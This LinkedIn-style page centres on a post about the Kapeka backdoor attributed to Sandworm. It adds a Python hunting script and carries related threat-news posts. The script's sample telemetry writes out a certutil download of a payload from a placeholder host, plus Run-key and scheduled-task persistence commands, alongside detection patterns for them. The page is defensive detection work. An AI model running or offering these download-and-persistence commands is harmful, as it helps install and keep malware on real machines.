🔴 A previously undocumented "flexible" backdoor called #Kapeka has been "sporadically" observed in cyber attacks targeting Eastern Europe, including #Estonia and #Ukraine, since at least mid-2022.
🔘 The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as #Sandworm (aka APT44 or Seashell Blizzard). Microsoft is tracking the same #malware under the name #KnuckleTouch.
🔘 "The malware [...] is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate," security researcher Mohammad Kazem Hassan Nejad said.
🔘 Kapeka comes fitted with a dropper that's designed to launch and execute a backdoor component on the infected host, after which it removes itself. The dropper is also responsible for setting up persistence for the backdoor either as a scheduled task or autorun #registry, depending on whether the process has #SYSTEM privileges.
🔘 Microsoft, in its own advisory released in February 2024, described Kapeka as involved in multiple campaigns distributing ransomware and that it can be used to carry out a variety of functions, such as stealing credentials and other data, conducting destructive #attacks, and granting #threat actors #remote #access to the #device.
🔘 The backdoor is a Windows DLL written in C++ and features an embedded command-and-control (C2) configuration that's used to establish contact with an actor-controlled server and holds information about the frequency at which the server needs to be polled in order to retrieve commands.
🔘 Besides masquerading as a #Microsoft Word add-in to make it appear genuine, the backdoor DLL gathers information about the compromised host and implements multi-threading to fetch incoming instructions, process them, and exfiltrate the results of the execution to the C2 #server.
🔘 "The backdoor uses #WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communication component," Nejad explained. "The backdoor communicates with its C2 to poll for tasks and to send back fingerprinted information and task results. The backdoor utilizes #JSON to send and receive information from its C2."
🔘 The implant is also capable of updating its C2 configuration on the fly by receiving a new version from the C2 server during polling. Some of the main features of the backdoor allow it to read and write files from and to #disk, launch payloads, execute shell commands, and even upgrade and uninstall itself.
🔘 The exact method through which the malware is propagated is currently unknown. However, Microsoft noted that the dropper is retrieved from compromised websites using the certutil utility, underscoring the use of a #legitimate living-off-the-land binary (LOLBin) to orchestrate the #attack. #rcc #cybersecurity #cyberintelligence #cybercrime #alert
România Cyber Center’s Post
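The post above mentions two observable behaviours a defender can hunt for: the dropper being fetched with certutil (a LOLBin download) and persistence being set up either as a scheduled task or as an autorun registry entry, depending on whether the process runs as SYSTEM. The following is an added example (not code from WithSecure, Microsoft or România Cyber Center) showing how those behaviours can be flagged in process-creation telemetry. The `user|image|command line` record format, the hostnames and every sample event are constructed for illustration; the certutil `-urlcache -f`, `reg add ... \Run` and `schtasks /create` patterns are real command-line shapes, but the rule names and thresholds are the author's own assumptions.

```python
"""Toy hunting rules over constructed process-creation records.

Added example, not code from the original post or the vendors it cites.
Record format ("user|image path|command line") and all sample events
are constructed; adapt parse() to your EDR or Sysmon export.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    user: str
    command_line: str


# Constructed sample telemetry. Hosts, users and paths are placeholders;
# example.invalid is a reserved, never-resolving domain.
SAMPLE_EVENTS = [
    "NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    "CORP\\alice|C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f "
    "http://example.invalid/dl/x.dat C:\\Users\\alice\\AppData\\Local\\Temp\\x.dat",
    "CORP\\alice|C:\\Windows\\System32\\certutil.exe|certutil.exe -hashfile C:\\setup.exe SHA256",
    "CORP\\alice|C:\\Windows\\System32\\reg.exe|reg.exe add "
    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ "
    "/d C:\\Users\\alice\\AppData\\Local\\Temp\\x.dat",
    "NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\schtasks.exe|schtasks.exe /create "
    "/tn Updater /sc onlogon /tr C:\\ProgramData\\x.dat /ru SYSTEM",
    "CORP\\bob|C:\\Windows\\System32\\schtasks.exe|schtasks.exe /query /tn Updater",
]

URL_RE = re.compile(r"(?i)\bhttps?://")
RUN_KEY_RE = re.compile(r"(?i)\\CurrentVersion\\Run(Once)?\b")


def parse(line):
    """Split one constructed record into (user, lowercased image path, command line)."""
    user, image, cmd = line.split("|", 2)
    return user, image.lower(), cmd


def rules(image, cmd):
    """Return the names of every hunting rule the event matches."""
    matched = []
    base = image.rsplit("\\", 1)[-1]
    low = cmd.lower()
    # LOLBin download: certutil pulling content from a URL into the cache.
    if base == "certutil.exe" and "-urlcache" in low and URL_RE.search(cmd):
        matched.append("certutil_download")
    # Autorun persistence: writing a value under a Run/RunOnce key.
    if base == "reg.exe" and " add " in low and RUN_KEY_RE.search(cmd):
        matched.append("run_key_persistence")
    # Scheduled-task persistence: task creation (queries are ignored).
    if base == "schtasks.exe" and "/create" in low:
        matched.append("scheduled_task_persistence")
    return matched


def detect(lines):
    """Run every rule over every record and collect findings."""
    findings = []
    for line in lines:
        user, image, cmd = parse(line)
        for rule in rules(image, cmd):
            findings.append(Finding(rule, user, cmd))
    return findings


def summarize(findings):
    """Count findings per rule, e.g. for a triage dashboard."""
    return dict(Counter(f.rule for f in findings))


def is_system(finding):
    """True when the flagged process ran in the SYSTEM context."""
    return finding.user.upper().endswith("\\SYSTEM")


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule:28} system={is_system(f)!s:5} {f.command_line}")
    print(summarize(detect(SAMPLE_EVENTS)))
```

In the constructed sample the Run-key write comes from an ordinary user and the task creation from SYSTEM, which is the split the post describes; in real triage, pairing a certutil download with a persistence event from the same user within a short window is a stronger signal than either alone.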
More Relevant Posts
-
The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader
-
"Reptile Rootkit: A Sophisticated Linux Malware Targeting Systems in South Korea" In recent events, threat actors have been observed utilizing an open-source #rootkit named "#Reptile" to target Linux-based systems in South Korea. According to a report published by the #AhnLab Security Emergency Response Center (#ASEC), Reptile distinguishes itself from other rootkit #malware by offering an additional capability - a reverse shell, which allows the attackers to assume control over the compromised systems. One noteworthy feature employed by Reptile is "port knocking," a technique where the malware opens a specific port on the infected system and enters a standby mode. Subsequently, when the threat actors transmit a special "magic packet" to the system, it serves as a trigger to establish a connection with the Command and Control (C&C) #server. #Rootkits are malicious software programs specifically designed to grant unauthorized and privileged access to a machine at the root level while effectively concealing their existence from detection. Since 2022, Reptile has been associated with at least four distinct campaigns, highlighting its growing prevalence and significance in cyber threats targeting Linux environments in South Korea. #cybersharks #itnews #informationsecurity #cybernews #hacker #ethicalhacker source: https://lnkd.in/dZjmvwVm
Reptile Rootkit: Advanced Linux Malware Targeting South Korean Systems
thehackernews.com
-
Cyber Security Analyst | Security + | Splunk ES | IBM QRadar | CrowdStrike | SentinelOne | Proofpoint | Armis Cyber Defense Core |
A Russia-linked threat group known as Turla has infected a European non-governmental organization (NGO) with a backdoor called TinyTurla-NG. The attack occurred in October 2023, with data exfiltration taking place in January 2024. The same malware was previously used in a cyber attack on a Polish NGO, indicating highly targeted activity. Turla used various techniques, such as creating exclusions in antivirus products and utilizing the Chisel tunneling software, to evade detection and maintain persistence. The exact method of intrusion is still under investigation. #soc #socanalyst #securityoperationscenter #cybersecurityanalyst #cybersecuritynews #malware #cyberattacks #microsoft #vulnerability #securityawareness #Cisco #redteam #blueteam #applenews #googlecybersecurity #google #apple #ios #osint
Russia Hackers Using TinyTurla-NG to Breach European NGO's Systems
thehackernews.com
-
The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader... Read more on the following blog article!
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
thehackernews.com
-
I specialize in reducing a company's cyber risk ✦ In Pursuit of Excellence ✦ Cybersecurity Professional ✦ Qualys Certified Specialist ✦ PCI DSS Compliance Specialist ✦ Desktop Advanced Support Expert ✦ GRC ✦ USAF Veteran
🛑 The infamous Russian hacking collective, known as APT28, is now using a legitimate Microsoft Windows feature to deploy infostealers and other malware to their victims. A new paper from IBM's cybersecurity arm, X-Force, claims the campaign has been active between November last year and February this year. As per the report, the attackers (also known as Fancy Bear, Forest Blizzard, or ITG05) are impersonating government and NGO organizations in Europe, South Caucasus, Central Asia, and North and South America, reaching out to their victims via email. The emails contain weaponized PDF files. The PDFs come with URLs that lead to compromised websites, which can abuse the "search-ms:" URI protocol handler, as well as the "search:" application protocol. The handler allows apps and HTML links to launch custom local searches on a device, while the protocol serves as a mechanism for calling the desktop search application on Windows. As a result, the victims end up performing searches on an attacker-controlled server, and coming up with malware displayed in Windows Explorer. This malware is disguised as a PDF file, which the victims are invited to download and run. The malware is hosted on WebDAV servers which themselves are most likely hosted on compromised Ubiquiti routers. These routers were part of a botnet that was apparently taken down by the U.S. government last month, The Hacker News reports. We don't know who the victims are, but it's safe to assume they're from the same countries as the government and NGO agencies being impersonated in the attacks: Argentina, Ukraine, Georgia, Belarus, Kazakhstan, Poland, Armenia, Azerbaijan, and the U.S. #russian #hackers #microsoft #windows #cybersecurity #malware
Russian hacker group exploits Microsoft Windows feature in worldwide phishing attack
techradar.com
-
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders: The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
thehackernews.com
-
"The infamous Russian hacking collective, known as APT28, is now using a legitimate Microsoft Windows feature to deploy infostealers and other malware to their victims. The attackers (also known as Fancy Bear, Forest Blizzard, or ITG05) are impersonating government and NGO organizations in Europe, South Caucasus, Central Asia, and North and South America, reaching out to their victims via email. The emails contain weaponized PDF files." It's critical that you arm your employees - and your security team - with the tools they need to STOP phishing attacks before they happen. It's time for PhishCloud Inc. PhishCloud arms employees with the tools they need to clearly spot and avoid #phishingattacks, across all digital platforms – not just email – letting them Click with Confidence. PhishCloud gives your security team the real-time visibility and control they need to see and block #phishing attacks your employees see. And with real-time metrics, you no longer need to rely on simulations and reporting to understand your phishing risk. And PhishCloud delivers reality-based training that imparts real knowledge, not just awareness. Sound too good to be true? Let us show you the power of PhishCloud Inc. Book a 15-minute demo at PhishCloud Inc. #technology #innovation #informationsecurity #phishingattackprevention https://lnkd.in/eus2Sjc4
Russian hacker group exploits Microsoft Windows feature in worldwide phishing attack
techradar.com
-
Targets located in Azerbaijan have been singled out as part of a new campaign that's designed to deploy Rust-based malware on compromised systems. Cybersecurity firm Deep Instinct is tracking the operation under the name Operation Rusty Flag. It has not been associated with any known threat actor or group. "The operation has at least two different initial access vectors," security researchers... Read more on the following blog article!
Operation Rusty Flag: Azerbaijan Targeted in New Rust-Based Malware Campaign
thehackernews.com
-
Carderbee Attacks: Hong Kong Organizations Targeted via Malicious Software Updates An attack on a software supply chain that targeted businesses primarily in Hong Kong and other parts of Asia has been linked to a previously unreported threat cluster. Under the insect-themed alias Carderbee, the Broadcom subsidiary Symantec Threat Hunter Team is monitoring the behavior. According to the cybersecurity company, the assaults use a trojanized version of the legitimate program EsafeNet Cobra DocGuard Client to install PlugX (also known as Korplug), a known backdoor, on the target networks. Reference from https://lnkd.in/djraXDeM #hongkong #cyberattack #threathunting #trojan Cyber Sleuths Cyber Security Association of India #backdoor #networking
Carderbee Attacks: Hong Kong Organizations Targeted via Malicious Software Updates
thehackernews.com